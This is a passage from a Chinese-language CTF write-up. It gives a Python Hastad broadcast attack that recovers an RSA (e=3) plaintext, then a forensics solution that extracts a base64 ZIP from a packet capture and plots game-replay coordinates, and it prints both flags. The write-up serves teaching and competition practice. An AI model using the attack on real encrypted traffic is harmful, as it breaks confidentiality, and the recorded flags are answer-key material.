questions.append({'n':n6,'c':c6})
questions.append({'n':n7,'c':c7})
e=3
for question in list(itertools.combinations(questions, 3)):
    # print(question)
    N = 1
    for i in range(len(question)):
        N*=question[i]['n']
    N_list = []
    for i in range(len(question)):
        N_list.append(N//question[i]['n'])
    t_list = []
    for i in range(len(question)):
        t_list.append(int(gmpy2.invert(N_list[i],question[i]['n'])))
    sum = 0
    for i in range(len(question)):
        sum = (sum+question[i]['c']*t_list[i]*N_list[i])%N
    sum = gmpy2.iroot(sum,e)[0]
    # print(sum)
    try:
        word = libnum.n2s(int(sum)).decode()
        print(word)
    except:
        pass

缝合最后的flag：

hgame{!f+y0u-pl4y_rem@ind3r~YOu^9ot=i7}

# MISC

# A R K

下载下来一个 Wireshark 的文件。打开分析，发现其中有上传 ssl.log 的记录.

右键追踪流->TCP流

另存为 ssl.log

直接导出所有 HTTP 内容：

getBattleReplay 中有 base64 编码的内容

使用程序解码并保存

import base64
input = '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'

result = base64.b64decode(input)

with open('./test','wb') as f:
    f.write(result)
print(result.decode('utf-8','ignore'))

查看文件 16 进制：

发现文件开头是 504B，zip文件的文件头是504B0304，把文件头修复之后用解压软件打开。

文件内容：

写个程序画出来

import json
with open('./default_entry','r') as f:
    json = json.loads(f.read())

table = [[0 for j in range(78)]for i in range(75)]
for point in json['journal']['logs']:
    table[point['pos']['row']-12][point['pos']['col']-12] = 1

for row in range(75):
    for col in range(78):
        if table[row][col]:
            print('██',end='')
        else:
            print('  ',end='')
    print()

扫描结果：

hgame{Did_y0u_ge7_Dusk?}

Asjdf

hgame-week3-writeup